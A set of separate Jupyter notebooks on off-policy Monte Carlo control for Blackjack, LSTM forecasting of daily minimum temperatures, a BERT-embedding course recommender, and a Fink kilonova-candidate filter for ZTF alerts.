The Monte Carlo algorithm discussed in this post will numerically estimate $v_\pi(s)$.
## 2. Environment
The environment is the game of *Blackjack*. The player tries to get cards whose sum is as great as possible without exceeding 21. Face cards count as 10. An ace can be taken either as a 1 or an 11. Two cards are dealt to both dealer and player. One of the dealer's cards is face up (the other is face down). The player can request additional cards, one by one (called *hits*) until the player stops (called *sticks*) or goes above 21 (goes *bust* and loses). When the player sticks it becomes the dealer's turn, which uses a fixed strategy: stick when the sum is 17 or greater and hit otherwise. If the dealer goes bust the player wins; otherwise the winner is determined by whose sum is closer to 21.
We formulate this game as an episodic finite MDP. Each game is an episode.
* States are based on the player's
* current sum (12-21)
* player will automatically keep on getting cards until the sum is at least 12 (this is a rule and the player does not have a choice in this matter)
* dealer's face up card (ace-10)
* whether player holds usable ace (True or False)
This gives a total of 200 states: $10 \times 10 \times 2 = 200$
* Rewards:
* +1 for winning
* -1 for losing
* 0 for drawing
* Reward for stick:
* +1 if sum > sum of dealer
* 0 if sum = sum of dealer
* -1 if sum < sum of dealer
* Reward for hit:
* -1 if sum > 21
* 0 otherwise
The environment is implemented using the OpenAI Gym library.
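The state count above can be verified by enumerating the state tuples directly (a quick sketch using the same factorization of player sum, dealer's showing card, and usable-ace flag):

```python
# player sum 12-21, dealer's showing card 1-10 (ace counted as 1), usable ace flag
states = [(total, showing, usable)
          for total in range(12, 22)
          for showing in range(1, 11)
          for usable in (False, True)]
print(len(states))  # 10 * 10 * 2 = 200
```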
## 3. Agent
The *agent* is the player. After observing the state of the *environment*, the agent can take one of two possible actions:
* stick (0) [stop receiving cards]
* hit (1) [have another card]
The agent's policy will be deterministic - it will always stick if the sum is 20 or 21, and hit otherwise. We call this *policy1* in the code.
## 4. Monte Carlo Estimation of the Action-value Function, $q_\pi(s,a)$
We will now proceed to estimate the action-value function for the given policy $\pi$. We can take $\gamma=1$ as the sum will remain finite:
$$ \large
\begin{aligned}
q_\pi(s,a) &= \mathbb{E}_\pi[G_t | S_t=s, A_t=a] \\
&= \mathbb{E}_\pi[R_{t+1} + \gamma R_{t+2} + \gamma ^2 R_{t+3} + ... + \gamma ^{T-t-1} R_T | S_t=s, A_t=a] \\
&= \mathbb{E}_\pi[R_{t+1} + R_{t+2} + R_{t+3} + ... + R_T | S_t=s, A_t=a]
\end{aligned}
$$
In numeric terms this means that, given a state and an action, we take the sum of all rewards from that state onwards (following policy $\pi$) until the game ends, and take the average of all such sequences.
### 4.1 Off-policy Estimation via Importance Sampling
On-policy methods, used so far in this series, represent a compromise. They learn action values not for the optimal policy but for a near-optimal policy that can still explore. Off-policy methods, on the other hand, make use of *two* policies - one that is being optimized (called the *target* policy) and another one (the *behavior* policy) that is used for exploratory purposes.
An important concept used by off-policy methods is *importance sampling*. This is a general technique for estimating expected values under one distribution by using samples from another. It allows us to weight returns according to the relative probability of a trajectory occurring under the target and behavior policies. This relative probability is called the importance-sampling ratio
$$ \large
\rho_{t:T-1}=\frac{\prod_{k=t}^{T-1} \pi(A_k|S_k) p(S_{k+1}|S_k,A_k)}{\prod_{k=t}^{T-1} b(A_k|S_k) p(S_{k+1}|S_k,A_k)}=\prod_{k=t}^{T-1} \frac{\pi(A_k|S_k)}{b(A_k|S_k)}
$$
where $\pi$ is the *target* policy, and $b$ is the *behavior* policy.
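As a sketch, the ratio can be accumulated over the (state, action) pairs of a trajectory. Here `pi` and `b` are assumed to be callables mapping a state to a vector of action probabilities (the names and signatures are our illustration, not the post's API):

```python
def importance_sampling_ratio(trajectory, pi, b):
    """rho_{t:T-1}: product over (s, a) pairs of pi(a|s) / b(a|s)."""
    rho = 1.0
    for s, a in trajectory:
        rho *= pi(s)[a] / b(s)[a]
    return rho

pi = lambda s: [1.0, 0.0]   # deterministic target: always action 0
b  = lambda s: [0.5, 0.5]   # uniform random behavior
print(importance_sampling_ratio([(0, 0), (1, 0), (2, 0)], pi, b))  # (1/0.5)^3 = 8.0
```

Note that as soon as the target policy assigns probability 0 to a taken action, the ratio collapses to 0 - which is why the control loop below can stop processing an episode at that point.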
In order to estimate $q_{\pi}(s,a)$ we need to estimate expected returns under the target policy. However, we only have access to returns due to the behavior
policy. To perform this "off-policy" procedure we can make use of the following:
$$ \large
\begin{aligned}
q_\pi(s,a) &= \mathbb E_\pi[G_t|S_t=s, A_t=a] \\
&= \mathbb E_b[\rho_{t:T-1}G_t|S_t=s, A_t=a]
\end{aligned}
$$
This allows us to simply scale or weight the returns under $b$ to yield returns under $\pi$.
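Ordinary importance sampling averages the scaled returns $\rho_i G_i$ directly, while the *weighted* variant used by the algorithm below normalizes by the sum of the ratios instead. A minimal sketch (function name ours):

```python
def weighted_is_estimate(returns, ratios):
    """Weighted importance-sampling estimate: sum(rho_i * G_i) / sum(rho_i)."""
    num = sum(rho * g for rho, g in zip(ratios, returns))
    den = sum(ratios)
    return num / den

print(weighted_is_estimate([1.0, -1.0], [3.0, 1.0]))  # (3*1 + 1*(-1)) / (3+1) = 0.5
```

The weighted estimator is biased but has much lower variance than the ordinary one, which is why it is preferred in practice.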
In our current *control* problem, the behavior policy $b$ is a fixed random policy, while the target policy $\pi$ is continually greedified with respect to $Q$.
## 5. Implementation
Figure 2 shows the off-policy control algorithm for estimating the optimal policy:

Next, we present the code that implements the algorithm.
```
import gym
import matplotlib
import numpy as np
import sys
from collections import defaultdict
import pprint as pp
from matplotlib import pyplot as plt
%matplotlib inline
# hide
# from lib import plotting as myplot
# from lib.envs.blackjack import BlackjackEnv
from dennybritz_lib import plotting as myplot
from dennybritz_lib.envs.blackjack import BlackjackEnv
# hide
# env = gym.make('Blackjack-v0')#.has differences cp to the one used here
#- env = gym.make('Blackjack-v1')#.does not exist
env = BlackjackEnv()
```
### 5.1 Policy
The following functions define the random *behavior* policy and the (initially empty) deterministic *target* policy:
```
def create_random_policy(n_A):
A = np.ones(n_A, dtype=float)/n_A
def policy_function(observation):
return A
return policy_function #vector of action probabilities
# hide
# def create_greedy_policy(Q):
# def policy_function(state):
# A = np.zeros_like(Q[state], dtype=float)
# best_action = np.argmax(Q[state])
# A[best_action] = 1.0
# return A
# return policy_function
# hide
# def create_policy():
# policy = defaultdict(int)
# for sum in [12, 13, 14, 15, 16, 17, 18, 19, 20, 21]:
# for showing in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]:
# for usable in [False, True]:
# policy[(sum, showing, usable)] = np.random.choice([0, 1]) #random
# # policy[(sum, showing, usable)] = 0 #all zeros
# return policy
def create_policy():
policy = defaultdict(int)
return policy
```
### 5.2 Generate episodes
The following function sets the environment to a random initial state. It then enters a loop where each iteration applies the policy to the environment's state to obtain the next action to be taken by the agent. That action is then applied to the environment to get the next state, and so on until the episode ends.
```
def generate_episode(env, policy):
episode = []
state = env.reset() #to a random state
while True:
probs = policy(state)
action = np.random.choice(np.arange(len(probs)), p=probs)
next_state, reward, done, _ = env.step(action) # St+1, Rt+1 OR s',r
episode.append((state, action, reward)) # St, At, Rt+1 OR s,a,r
if done:
break
state = next_state
return episode
```
### 5.3 Main loop
The following function implements the main loop of the algorithm. It iterates for ``n_episodes``. It also takes a list of ``monitored_state_actions`` for which it will record the evolution of action values. This is handy for showing how action values converge during the process.
```
def mc_control(env, n_episodes, discount_factor=1.0, monitored_state_actions=None, diag=False):
#/// G_sum = defaultdict(float)
#/// G_count = defaultdict(float)
Q = defaultdict(lambda: np.zeros(env.action_space.n))
C = defaultdict(lambda: np.zeros(env.action_space.n))
pi = create_policy()
monitored_state_action_values = defaultdict(list)
for i in range(1, n_episodes + 1):
if i%1000 == 0: print("\rEpisode {}/{}".format(i, n_episodes), end=""); sys.stdout.flush()
b = create_random_policy(env.action_space.n)
episode = generate_episode(env, b); print(f'\nepisode {i}: {episode}') if diag else None
G = 0.0
W = 1.0
for t in range(len(episode))[::-1]:
St, At, Rtp1 = episode[t]
print(f"---t={t} St, At, Rt+1: {St, At, Rtp1}") if diag else None
G = discount_factor*G + Rtp1; print(f"G: {G}") if diag else None
C[St][At] += W; print(f"C[St][At]: {C[St][At]}") if diag else None #Weighted Importance Sampling (WIS) denominator
Q[St][At] += (W/C[St][At])*(G - Q[St][At]); print(f"Q[St][At]: {Q[St][At]}") if diag else None
pi[St] = np.argmax(Q[St]) #greedify pi, max_a Q[state][0], Q[state][1]
if At != pi[St]: #pi[St] is already the greedy action index, so compare directly
break
W = W*1.0/b(St)[At]; print(f"W: {W}, b(St)[At]: {b(St)[At]}") if diag else None
if monitored_state_actions:
for msa in monitored_state_actions:
s = msa[0]; a = msa[1]
# print("\rQ[{}]: {}".format(msa, Q[s][a]), end=""); sys.stdout.flush()
monitored_state_action_values[msa].append(Q[s][a])
print('\n++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++') if diag else None
#/// pp.pprint(f'G_sum: {G_sum}') if diag else None
#/// pp.pprint(f'G_count: {G_count}') if diag else None
print('++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++') if diag else None
print('\nmonitored_state_action_values:', monitored_state_action_values) if diag else None
return Q,pi,monitored_state_action_values
```
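The core of the loop above is the incremental weighted-importance-sampling update, `C[St][At] += W` followed by `Q[St][At] += (W/C[St][At])*(G - Q[St][At])`. A quick standalone check (with made-up weights and returns, not notebook data) confirms that this incremental form reproduces the direct weighted average $\sum_i W_i G_i / \sum_i W_i$:

```
import numpy as np

# Sanity check (toy numbers): the incremental update
#   C += W;  Q += (W / C) * (G - Q)
# should match the direct weighted average sum(W_i * G_i) / sum(W_i).
rng = np.random.default_rng(0)
Ws = rng.uniform(0.5, 2.0, size=10)  # assumed importance-sampling ratios
Gs = rng.normal(size=10)             # assumed returns

Q, C = 0.0, 0.0
for W, G in zip(Ws, Gs):
    C += W                    # WIS denominator
    Q += (W / C) * (G - Q)    # incremental WIS estimate

direct = (Ws * Gs).sum() / Ws.sum()
assert np.isclose(Q, direct)
```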
### 5.4 Monitored state-actions
Let's pick a number of state-actions to monitor. Each tuple captures the player's sum, the dealer's showing card, and whether the player has a usable ace, as well as the action taken in the state:
```
monitored_state_actions=[((21, 7, False), 0), ((20, 7, True), 0), ((12, 7, False), 1), ((17, 7, True), 0)]
Q,pi,monitored_state_action_values = mc_control(
env,
n_episodes=10,
monitored_state_actions=monitored_state_actions,
diag=True)
Q
Q[(13, 5, False)]
pi
pi[(18, 4, False)]
V = defaultdict(float)
for state, actions in Q.items():
action_value = np.max(actions)
V[state] = action_value
V
print(monitored_state_actions[0])
print(monitored_state_action_values[monitored_state_actions[0]])
#
# last value in monitored_state_action_values should equal the corresponding value in Q
msa = monitored_state_actions[0]; print('msa:', msa)
s = msa[0]; print('s:', s)
a = msa[1]; print('a:', a)
monitored_state_action_values[msa][-1], Q[s][a] #monitored_stuff[msa] BUT Q[s][a]
```
### 5.5 Run 1
First, we will run the algorithm for 10,000 episodes, storing the results in ``Q1`` and ``pi1``:
```
Q1,pi1,monitored_state_action_values1 = mc_control(
env,
n_episodes=10_000,
monitored_state_actions=monitored_state_actions,
diag=False)
#
# last value in monitored_state_action_values should equal the corresponding value in Q
msa = monitored_state_actions[0]; print('msa:', msa)
s = msa[0]; print('s:', s)
a = msa[1]; print('a:', a)
monitored_state_action_values1[msa][-1], Q1[s][a] #monitored_stuff[msa] BUT Q[s][a]
```
The following chart shows how the action-value estimates of the 4 monitored state-actions evolve during training:
```
plt.rcParams["figure.figsize"] = (18,10)
for msa in monitored_state_actions:
plt.plot(monitored_state_action_values1[msa])
plt.title(r'Estimated $q_\pi(s,a)$ for some state-actions', fontsize=18)
plt.xlabel('Episodes', fontsize=16)
plt.ylabel(r'Estimated $q_\pi(s,a)$', fontsize=16)
plt.legend(monitored_state_actions, fontsize=16)
plt.show()
```
The following charts show the estimated optimal state-value function, $v_*(s)$, for the cases with and without a usable ace. First, we compute ```V1```, the estimate of $v_*(s)$:
```
V1 = defaultdict(float)
for state, actions in Q1.items():
action_value = np.max(actions)
V1[state] = action_value
AZIM = -110
ELEV = 20
myplot.plot_pi_star_and_v_star(pi1, V1, title=r"$\pi_*$ and $v_*$", wireframe=False, azim=AZIM-40, elev=ELEV);
```
### 5.6 Run 2
Our final run uses 500,000 episodes, which gives a more accurate estimate of the action-value function.
```
Q2,pi2,monitored_state_action_values2 = mc_control(
env,
n_episodes=500_000,
monitored_state_actions=monitored_state_actions,
diag=False)
#
# last value in monitored_state_action_values should equal the corresponding value in Q
msa = monitored_state_actions[0]; print('msa:', msa)
s = msa[0]; print('s:', s)
a = msa[1]; print('a:', a)
monitored_state_action_values2[msa][-1], Q2[s][a] #monitored_stuff[msa] BUT Q[s][a]
plt.rcParams["figure.figsize"] = (18,12)
for msa in monitored_state_actions:
plt.plot(monitored_state_action_values2[msa])
plt.title(r'Estimated $q_\pi(s,a)$ for some state-actions', fontsize=18)
plt.xlabel('Episodes', fontsize=16)
plt.ylabel(r'Estimated $q_\pi(s,a)$', fontsize=16)
plt.legend(monitored_state_actions, fontsize=16)
plt.show()
V2 = defaultdict(float)
for state, actions in Q2.items():
action_value = np.max(actions)
V2[state] = action_value
# myplot.plot_action_value_function(Q2, title="500,000 Steps", wireframe=True, azim=AZIM, elev=ELEV)
myplot.plot_pi_star_and_v_star(pi2, V2, title=r"$\pi_*$ and $v_*$", wireframe=False, azim=AZIM-40, elev=ELEV);
```
|
github_jupyter
|
```
import pandas as pd
from sklearn.model_selection import train_test_split
'''
NOTE: This was done in Google Colab
The data (Minimum Daily Temperatures Dataset) is from
Jason Brownlee's "7 Time Series Datasets for Machine Learning" article:
https://machinelearningmastery.com/time-series-datasets-for-machine-learning/
His datasets are found at:
https://github.com/jbrownlee/Datasets
This specific data is found at:
https://github.com/jbrownlee/Datasets/blob/master/daily-min-temperatures.csv
It is also found at:
https://www.kaggle.com/paulbrabban/daily-minimum-temperatures-in-melbourne/
'''
#Obtain Data:
df = pd.read_csv('/content/daily-min-temperatures.csv')
train, test = train_test_split(df,test_size=0.25)
train_x, train_y = train[['Date']], train[['Temp']]
test_x, test_y = test[['Date']], test[['Temp']]
'''
Naive approach
-Convert Date into Year, Month, Day; Month and Day become one-hot variables.
-Drop the year, so the notion of a specific year is not in this model.
-The idea is that the model should notice that winter months are colder than summer months.
'''
import tensorflow as tf
import tensorflow.keras
from datetime import datetime
from tensorflow.keras import layers, Sequential
from sklearn.preprocessing import MinMaxScaler
def build_model():
model = Sequential([
layers.Flatten(input_shape=(43,)),
layers.Dropout(0.5),
layers.Dense(43,activation='relu'),
layers.Dropout(0.5),
layers.Dense(1),
])
model.compile(optimizer='adam',loss='mse',metrics=['mae','mse'])
return model
def convertDates(df):
dateConverted = df[['Date']].apply([
lambda d : datetime.strptime(d.Date, '%Y-%m-%d'),
lambda d : d.Date[:4],
lambda d : d.Date[5:7],
lambda d : d.Date[8:]
],axis=1).set_axis(['Datetime','Year','Month','Day'],axis=1)
#One Hot conversion for dates
for c in ['Month','Day']:
oneHot = pd.get_dummies(dateConverted[c],prefix=c)
dateConverted = dateConverted.drop(c,axis=1)
dateConverted = dateConverted.join(oneHot)
return dateConverted
def normalizeTemp(df):
mms = MinMaxScaler()
normalized_train_y = mms.fit_transform(df[['Temp']])
return normalized_train_y
def massageData(df):
#Expand Dates
dateConverted = convertDates(df)
#Remove certain columns
dateConverted.pop('Datetime')
dateConverted.pop('Year')
#Normalize temperatures
return dateConverted, normalizeTemp(df)
df = pd.read_csv('/content/daily-min-temperatures.csv')
new_dates, new_temp = massageData(df)
train_x, test_x, train_y, test_y = train_test_split(new_dates, new_temp,test_size=0.25)
model = build_model()
model.fit(train_x,train_y,epochs=80,validation_split=0.2)
model.evaluate(test_x,test_y,verbose=1)
'''
The naive approach seems to predict averages rather than track the actual values.
Also, predictions for dates outside the training range may become wildly inaccurate.
'''
df = pd.read_csv('/content/daily-min-temperatures.csv')
convertedDates = convertDates(df)
predicted1 = pd.DataFrame(model.predict(convertedDates[convertedDates.columns[2:]]),columns=['PredictedTemp1'])
temps = predicted1.join(pd.DataFrame(normalizeTemp(df[['Temp']]),columns=['TrueValue']))
datetimeToTemp = convertedDates[['Datetime']].join(temps)
datetimeToTemp.plot('Datetime',figsize=(30,10))
datetimeToTemp
'''
Less naive approach (AKA "featurize the past")
-Convert Date into Year, Month, Day; Month and Day become one-hot variables.
-Drop the year, so the notion of a specific year is not in this model.
-Add 30 feature columns containing the previous 30 days of temperatures.
-The idea is that the previous days can affect the next.
'''
import numpy as np
import tensorflow as tf
import tensorflow.keras
from datetime import datetime
from tensorflow.keras import layers, Sequential
from sklearn.preprocessing import MinMaxScaler
def build_model():
model = Sequential([
layers.Flatten(input_shape=(73,)),
layers.Dropout(0.5),
layers.Dense(73,activation='relu'),
layers.Dropout(0.5),
layers.Dense(1),
])
model.compile(optimizer='adam',loss='mse',metrics=['mae','mse'])
return model
def convertDates(df):
dateConverted = df[['Date']].apply([
lambda d : datetime.strptime(d.Date, '%Y-%m-%d'),
lambda d : d.Date[:4],
lambda d : d.Date[5:7],
lambda d : d.Date[8:]
],axis=1).set_axis(['Datetime','Year','Month','Day'],axis=1)
#One Hot conversion for dates
for c in ['Month','Day']:
oneHot = pd.get_dummies(dateConverted[c],prefix=c)
dateConverted = dateConverted.drop(c,axis=1)
dateConverted = dateConverted.join(oneHot)
return dateConverted
def normalizeTemp(df):
mms = MinMaxScaler()
normalized_train_y = mms.fit_transform(df[['Temp']])
return normalized_train_y
def massageData(df):
#Expand Dates
dateConverted = convertDates(df)
#Remove certain columns
dateConverted.pop('Datetime')
dateConverted.pop('Year')
#Normalize temperatures
return dateConverted, normalizeTemp(df)
df = pd.read_csv('/content/daily-min-temperatures.csv')
new_dates, new_temp = massageData(df)
new_temp_df = pd.DataFrame(new_temp,columns=['Temp'])
#Add the past into it.
for i in range(1,31):
new_dates['temp_days_minus_'+str(i)] = new_temp_df[['Temp']].shift(i)
new_dates = new_dates[30:]
new_temp = new_temp[30:]
train_x, test_x, train_y, test_y = train_test_split(new_dates, new_temp,test_size=0.25)
model = build_model()
model.fit(train_x,train_y,epochs=80,validation_split=0.2,verbose=0)
model.evaluate(test_x,test_y,verbose=1)
'''
This still seems to have the same issues as the last one.
The only apparent difference is that the second model seems to
follow the extremes more closely.
'''
df = pd.read_csv('/content/daily-min-temperatures.csv')
convertedDates = convertDates(df)[30:]
predicted1edited = predicted1[30:]
predicted1edited.index = convertedDates.index = range(0,len(convertedDates))
predicted2 = pd.DataFrame(model.predict(new_dates),columns=['PredictedTemp2'])
temps = predicted1edited.join(predicted2).join(pd.DataFrame(new_temp,columns=['TrueTemp']))
datetimeToTemp = convertedDates[['Datetime']].join(temps)
datetimeToTemp.plot('Datetime',figsize=(30,10))
datetimeToTemp
'''
Long-Short Term Memory approach.
-Use LSTM and concepts from RNN networks.
'''
import numpy as np
import pandas as pd
import tensorflow as tf
import tensorflow.keras
from sklearn.model_selection import train_test_split
from datetime import datetime
from tensorflow.keras import layers, Sequential
from sklearn.preprocessing import MinMaxScaler
def convertDates(df):
dateConverted = df[['Date']].apply([
lambda d : datetime.strptime(d.Date, '%Y-%m-%d')
],axis=1).set_axis(['Datetime'],axis=1)
return dateConverted
def normalizeTemp(df):
mms = MinMaxScaler()
normalized_train_y = mms.fit_transform(df[['Temp']])
return normalized_train_y
def massageData(df):
#Expand Dates
dateConverted = convertDates(df)
#Remove the Datetime column ('Year' no longer exists in this version of convertDates)
dateConverted.pop('Datetime')
#Normalize temperatures
return dateConverted, normalizeTemp(df)
df = pd.read_csv('/content/daily-min-temperatures.csv')
norm_temp = normalizeTemp(df)
def build_model():
model = Sequential([
layers.LSTM(30,input_shape=(30,1)),
layers.Dense(1),
])
model.compile(optimizer='adam',loss='mae',metrics=['mae','mse'])
return model
xs = np.array([
np.reshape(norm_temp[i-30:i],(30,1)) #window of the 30 days immediately before day i
for i in range(31,len(norm_temp))])
ys = np.array([
norm_temp[i]
for i in range(31,len(norm_temp))])
c = ["temp_"+str(x) for x in range(1,31)]+["true_value"]
train_x, test_x, train_y, test_y = train_test_split(xs,ys,test_size=0.25)
model = build_model()
print(train_y.shape)
print(test_y.shape)
model.fit(train_x,train_y,validation_split=0.2,epochs=80)
model.evaluate(test_x,test_y,verbose=1)
'''
It appears RNNs really do work here.
'''
predicted3 = pd.DataFrame(model.predict(xs),columns=['PredictedTemp3'])
true = pd.DataFrame(ys,columns=['True'])
plot_me = datetimeToTemp.join(predicted3)
plot_me = plot_me[['PredictedTemp1','PredictedTemp2','PredictedTemp3','TrueTemp']]
plot_me.plot(figsize=(30,20))
err = plot_me.apply([
lambda a : abs(a.PredictedTemp1 - a.TrueTemp),
lambda a : abs(a.PredictedTemp2 - a.TrueTemp),
lambda a : abs(a.PredictedTemp3 - a.TrueTemp)
],axis=1).set_axis(['Err1','Err2','Err3'],axis=1)
#cumulative error comparison.
err.rolling(99999,min_periods=1).sum().plot(figsize=(30,10))
```
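The sliding-window construction used to build ``xs``/``ys`` for the LSTM (previous 30 values in, next value out) can be written as a small generic helper. This sketch uses a synthetic series rather than the temperature data:

```
import numpy as np

# Generic sliding-window builder (illustration with a synthetic series):
# each sample holds the previous `window` values; the target is the next one.
def make_windows(series, window=30):
    xs = np.array([series[i - window:i] for i in range(window, len(series))])
    ys = np.array([series[i] for i in range(window, len(series))])
    return xs.reshape(-1, window, 1), ys  # (samples, timesteps, features)

series = np.arange(100, dtype=float)
xs, ys = make_windows(series)
print(xs.shape, ys.shape)  # (70, 30, 1) (70,)
```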
|
github_jupyter
|
## This notebook:
- Try a deep learning method for content-based filtering
----------------------
### 1. Read files into dataframe
### 2. concat_prepare(f_df, w_df)
- Concat f_21, w_22
### 3. store_model(df) - only once for a new dataframe
- Train a SentenceTransformer model
- Save embedder, embeddings, and corpus
### 4. Read the stored embedder, embeddings, and corpus
### 5. dl_content(df, embeddings, corpus, embedder, course_title, k = 10, filter_level = 'subject', semester = 'fall', lsa = None)
- input
- df: dataset
- embeddings, corpus, embedder: stored embeddings, stored corpus, stored embedder
- course_title: input course title
- k: number of recommendations
- filter_level, semester, lsa
- output
- recommended courses in df
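At its core, the recommender below is a nearest-neighbour search over sentence embeddings. A toy sketch with made-up 2-d vectors (the real notebook uses 768-d SentenceTransformer embeddings indexed with ``faiss.IndexFlatL2``):

```
import numpy as np

# Toy nearest-neighbour search (made-up 2-d vectors): recommend the k items
# whose embedding lies closest, in L2 distance, to the query embedding.
item_embeddings = np.array([[1.0, 0.0], [0.9, 0.1], [0.0, 1.0], [-1.0, 0.0]])
query = np.array([1.0, 0.05])

d2 = ((item_embeddings - query) ** 2).sum(axis=1)  # squared L2 distances
k = 2
top_k = np.argsort(d2)[:k]  # indices of the k closest items
print(top_k)  # [0 1]
```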
```
import pandas as pd
import numpy as np
import pickle
import sklearn
import faiss
import spacy
from sentence_transformers import SentenceTransformer
import scipy.spatial
online = pd.read_csv('assets/original/2021-10-19-MichiganOnline-courses.csv')
f_21 = pd.read_csv('assets/f_21_merge.csv')
w_22 = pd.read_csv('assets/w_22_merge.csv')
def concat_prepare(f_df, w_df):
f_df['semester'] = 'fall'
w_df['semester'] = 'winter'
# Concat
df = pd.concat([f_df, w_df])
# Clean
df = df.fillna('').drop_duplicates(subset=['course']).reset_index().drop(columns='index')
# Remove description with no information
df['description'].replace('(Hybrid, Synchronous)', '', inplace = True)
# Merge all the text data
df['text'] = df['Subject'] + ' ' \
+ df['Course Title'] + ' ' \
+ df['sub_title'] +' '\
+ df['description']
return df
fw = concat_prepare(f_21, w_22)
def store_model(df):
corpus = df['text'].tolist()
embedder = SentenceTransformer('bert-base-nli-mean-tokens')
corpus_embeddings = embedder.encode(corpus)
with open('corpus_embeddings.pkl', "wb") as fOut:
pickle.dump({'corpus': corpus, 'embeddings': corpus_embeddings}, fOut, protocol=pickle.HIGHEST_PROTOCOL)
with open('embedder.pkl', "wb") as fOut:
pickle.dump(embedder, fOut, protocol=pickle.HIGHEST_PROTOCOL)
#store_model(fw)
```
## Bert Sentence Transformer
```
%%time
#Load sentences & embeddings from disc
with open('corpus_embeddings.pkl', "rb") as fIn:
stored_data = pickle.load(fIn)
stored_corpus = stored_data['corpus']
stored_embeddings = stored_data['embeddings']
with open('embedder.pkl', "rb") as fIn:
stored_embedder = pickle.load(fIn)
len(stored_corpus), len(fw['text'].to_list())
```
## Deep learning content based filtering
```
def dl_content(df, embeddings, corpus, embedder, course_title, k = 10, filter_level = 'subject', semester = 'fall', lsa = None):
# df: dataset
# embeddings: stored_embeddings
# corpus: stored_corpus or df['text'].tolist() -- should be the same
# embedder: stored_embedder
# course_title = input course title
# k = number of recommendation
# filter_level = 'subject', semester = 'fall', lsa = None
# If the len of corpus doesn't match the len of input df text, can't process the rec sys properly.
if len(corpus) != len(df['text']):
print('Stored corpus and the text of the input dataset are different.')
return None
else:
input_ag = df.loc[df['course'] == course_title, 'Acad Group'].unique()
input_sub = df.loc[df['course'] == course_title, 'Subject'].unique()
input_course = df.loc[df['course'] == course_title, 'Course Title'].unique()
input_subtitle = df.loc[df['course'] == course_title, 'sub_title'].unique()
input_des = df.loc[df['course'] == course_title, 'description'].unique()
query = [' '.join(input_sub + input_course + input_subtitle + input_des)]
if len(query[0]) == 0:
print('No text information was provided for the recommender system')
return None
d = 768
index = faiss.IndexFlatL2(d)
index.add(np.stack(embeddings, axis=0))
query_embedding = embedder.encode(query)
distances, indices = index.search(query_embedding, k) # actual search
#print("Query:", query)
rec_df = df.iloc[indices[0],:]
# Filter the df
# Filter df with semester
if semester in ['fall', 'winter']:
df = df[df['semester'] == semester]
else:
pass
# Filter df with acad_group
if filter_level == 'academic_group':
rec_df = rec_df[rec_df['Acad Group'].isin(input_ag)]
elif filter_level == 'subject':
rec_df = rec_df[(rec_df['Subject'].isin(input_sub)) | (rec_df['Course Title'].isin(input_course))]
else:
pass
req_dis = list(rec_df['requirements_distribution'].unique())
# Filter the df with lsa
if lsa in req_dis:
rec_df = rec_df[rec_df['requirements_distribution'] == lsa]
else:
# Give error message or no df
pass
return rec_df[:k]
%%time
dl_content(fw, stored_embeddings, stored_corpus, stored_embedder, 'EECS 587', k = 10, filter_level = None, semester = 'fall', lsa = 'BS')
import gensim
import gensim.corpora as corpora
from gensim.utils import simple_preprocess
from gensim.models import CoherenceModel
from gensim.models.ldamulticore import LdaMulticore
courses = fw['course'].unique()
def calc_topic_coherence(df):
def gen_words(texts):
final = []
for text in texts:
new = gensim.utils.simple_preprocess(text, deacc=True)
final.append(new)
return (final)
texts = gen_words(df['description'])
num_topics = 1
id2word = corpora.Dictionary(texts)
corpus = [id2word.doc2bow(text) for text in texts]
try:
model = LdaMulticore(corpus=corpus,id2word = id2word, num_topics = num_topics, alpha=.1, eta=0.1, random_state = 42)
#print('Model created')
coherencemodel = CoherenceModel(model = model, texts = texts, dictionary = id2word, coherence = 'c_v')
#print("Topic coherence: ",coherencemodel.get_coherence())
coherence_value = coherencemodel.get_coherence()
except Exception:
coherence_value = None
return coherence_value
def coh(func):
coh_val = []
i = 0
while i <100:
input_course = np.random.choice(courses, 1)[0]
rec_df = func(fw, stored_embeddings, stored_corpus, stored_embedder, input_course, k = 10, filter_level = None, semester = '', lsa = '')
rec_df = rec_df.append(fw[fw['course'] == input_course])
rec_df['description'] = rec_df['description'].fillna('').astype(str)
val = calc_topic_coherence(rec_df)
if val is not None:
coh_val.append(val)
i+=1
avg_coh_sk = np.average(coh_val)
return avg_coh_sk
%%time
dl_coh = coh(dl_content)
dl_coh
```
|
github_jupyter
|
# GRANDMA/Kilonova-catcher --- KN-Mangrove
The purpose of this notebook is to inspect the ZTF alerts that were selected by the Fink KN-Mangrove filter as potential Kilonova candidates in the period 2021/04/01 to 2021/08/31, and forwarded to the GRANDMA/Kilonova-catcher project for follow-up observations.
With the other filter (KN-LC), we need at least two days to identify a candidate. It may seem like a short amount of time, but if the object is a kilonova, it will already be fading or even too faint to be observed. The second filter aims to tackle younger detections. An alert will be considered as a candidate if, on top of the other cuts, one can identify a suitable host and the resulting absolute magnitude is compatible with the kilonovae models.
To identify possible hosts, we used the MANGROVE catalog [1]. It is an inventory of 800,000 galaxies. At this point, we are only interested in their position in the sky: right ascension, declination, and luminosity distance. We only considered the galaxies in a 230 Mpc range, as it is the current observation range of the gravitational waves interferometers.
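Restricting such a catalog to the 230 Mpc range is a simple selection. A sketch with made-up rows, assuming a DataFrame with a ``lum_dist`` column in Mpc (the column name used later in this notebook):

```
import pandas as pd

# Toy catalog (made-up values): keep only galaxies within 230 Mpc,
# matching the observation range of the gravitational-wave interferometers.
galaxies = pd.DataFrame({
    'ra': [10.0, 150.0, 200.0],
    'dec': [-5.0, 2.0, 45.0],
    'lum_dist': [50.0, 310.0, 120.0],  # Mpc
})
nearby = galaxies[galaxies['lum_dist'] <= 230.0]
print(len(nearby))  # 2
```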
This filter uses the following cuts:
- Point-like object: the star/galaxy extractor score must be above 0.4. This could be justified by saying that the alert should be a point-like object. Actually, few objects score below 0.4 given the current implementation, and objects that do are most likely bogus detections.
- Non-artefact: the deep real/bogus score must be above 0.5.
- Object not referenced in the SIMBAD catalog (which lists galactic objects).
- Young detection: less than 6 hours.
- Galaxy association: the alert should lie within 10 kpc of a galaxy from the Mangrove catalog.
- Absolute magnitude: the absolute magnitude of the alert should be −16 ± 1.
According to [2], we expect a kilonova event to display an absolute magnitude of −16 ± 1. Since we generally don't know the distance of an alert, we compute its absolute magnitude as if it were located in the associated galaxy. This threshold is given in the g band, but for lack of observations it was applied to both the g and r bands without distinction.
The galaxy association method is also not perfect: it can lead to the mis-association of an event that is in the foreground or the background of a galaxy. But this is necessary as the luminosity distance between the earth and the alert is usually unknown.
